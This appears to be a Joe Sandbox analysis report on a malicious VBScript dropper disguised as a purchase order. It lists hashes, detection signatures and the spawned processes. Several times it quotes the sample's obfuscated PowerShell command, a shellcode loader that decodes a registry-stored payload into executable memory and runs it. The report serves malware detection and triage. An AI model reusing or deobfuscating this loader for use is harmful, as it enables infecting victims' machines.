Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SIEM_PO00938467648.vbs

Overview

General Information

Sample Name:SIEM_PO00938467648.vbs
Analysis ID:756154
MD5:633811bccf3fe62978ce41a04b653083
SHA1:bc81307b5c229094617e7cb8cdcaec55eaddad36
SHA256:b5e4225737f935940fa23989440d5ea2c123c8affde25d6d7224e2b4abab5608
Tags:vbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Antivirus detection for URL or domain
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Machine Learning detection for dropped file
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 8 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 2976 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2528 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnhPorBieSoaVadEmABlfPafPaiChnFeimitSpySlMPraNisBrkab(CeiNgnCatCr teRBeedebOuuFoiAflUn,BriSlnFitBa SuSTeeAnmHeiDasRr)Ho;Ba[TrDTrlSplVaIMamSapMaoCortitPr(Ud`"""StuNosKoeJorEl3En2Sp`"""St)Bu]chpReuBlbGulFliCacUn OusOutScaUntGoiRecor SteabxArtcheSerBunFo PoiRenJotMi SpSKoeAftJuMEmeInnReuBjIPrtFieStmXeIHongefFeoSi(OpiTrnmotSu ReCRhaBlbBrrSoiSk,AaiDonSktDo reOTepFiaNolUt,UniBunSutFl ClHskaFoaEn,whiHinSptIn GaARemCopFluPr)Ti;Ge}As'Et;Sp`$SpTPtuDueudiKorTooTonPi3Lu=Oo[JgTShuAueAuiFrrAcoovnRe1Bi]Ac:Do:LiVAnikdrBltniuSwaNolWeAStldelNooFocFo(Va0Co,Dr1Un0Ha4An8In5Un7Im6He,al1En2Pr2Ek8St8Gu,Bl6Co4Un)Pe;Ro`$ProFurUpnSaiBetTrhProAasChaBruDarTiiEsaSlnKi=Fi(EkGReeustDe-PrIDetBeeRemSkPGurPloPipReeStrSktMiyOt Ej-JePVeaMatrehTr Sn'EfHPrKTrCuaUSp:Vi\DePgoeMidpnaMigunoOvgCl\ReDCaeVofHmiIbbZerHaiFolSolcoaBatRaiChoPunoveBlnDosMo'Sk)Le.CaELilPluFrtFoiPyoFrnQu;ir`$PoiTanPotGouCurBinHveSidAl Po=sp er[PrSAeyKosIntUneTymTi.LuCGaoUbnDavTheAarIntNe]Ox:Zi:ApFGurMuoCamSoBAwaResFreHo6Sa4StSNitLnrUniGunUngFo(St`$ApobjrAunCriIntCohUnoPosUnaKeuMarAniNoaUnnAr)Fo;Sk[TrSEjyAfsVitWaeTimre.GeRGnuFonUntStiKrmUneJo.trILenSatHeeGorsioLopSeSSteDarchvMeiBicBoeEssAj.FeMBraAprNjsFohUnaUnlBa]Me:Ov:haCUdoBrpFjyBr(Ne`$DaiKanBetSluAnrOmnLgePidRe,Sc Fe0yo,Su Na Ko`$PeTMuuUneLiizirEmoannin3Do,Ci Pl`$RiiXanMitSpuSorThnTeeRedMa.SocAloStuRhnKotsp)Ta;Un[FaTKouveeLsifarNooPrnFr1st]Be:Dy:EsEManNouUnmboSUnyTisAstDieMomViLTeoBecDeaUrlBueUnsNoWUn(Po`$AbTPruSyePriAurSkoSinPr3Sk,Uk St0Ha)Ug#Sm;""";Function Tueiron4 { param([String]$sheikdmmerne); For($circumtropical=2; $circumtropical -lt $sheikdmmerne.Length-1; $circumtropical+=(2+1)){ $Driblende = $Driblende + $sheikdmmerne.Substring($circumtropical, 1); } $Driblende;}$Reptilious0 = Tueiron4 'DaIKgEtiXSk ';$Reptilious1= Tueiron4 $Biliate;&$Reptilious0 $Reptilious1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4184 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6012 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SIEM_PO00938467648.vbsWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa35:$s1: .CreateObject("WScript.Shell")
  • 0x3e4db:$p1: powershell.exe
  • 0x4b22c:$p1: powershell.exe

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2528INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xc14e:$b2: ::FromBase64String(
  • 0xd089:$b2: ::FromBase64String(
  • 0x15f18:$b2: ::FromBase64String(
  • 0x104597:$b2: ::FromBase64String(
  • 0x10b6f5:$b2: ::FromBase64String(
  • 0x33c33:$s1: -join
  • 0x40d08:$s1: -join
  • 0x440da:$s1: -join
  • 0x4478c:$s1: -join
  • 0x4627d:$s1: -join
  • 0x48483:$s1: -join
  • 0x48caa:$s1: -join
  • 0x4951a:$s1: -join
  • 0x49c55:$s1: -join
  • 0x49c87:$s1: -join
  • 0x49ccf:$s1: -join
  • 0x49cee:$s1: -join
  • 0x4a53e:$s1: -join
  • 0x4a6ba:$s1: -join
  • 0x4a732:$s1: -join
  • 0x4a7c5:$s1: -join

Other

SourceRuleDescriptionAuthorStrings
amsi64_8.amsi.csvWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0x1a:$s1: .CreateObject("WScript.Shell")
  • 0x72:$s1: .CreateObject("WScript.Shell")
  • 0x1da:$p1: powershell.exe

Sigma Signatures

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSle

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: SIEM_PO00938467648.vbsReversingLabs: Detection: 34%
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png7zAvira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dllJoe Sandbox ML: detected
Source: Binary string: ,l7C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.pdb source: powershell.exe, 00000003.00000002.833248284.00000000053E0000.00000004.00000800.00020000.00000000.sdmp
Source: powershell.exe, 00000003.00000002.820596079.000000000319B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000003.499891635.0000000007E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.485360796.0000000007E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png7z
Source: powershell.exe, 00000003.00000002.823390885.0000000004CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html7z
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester7z
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe 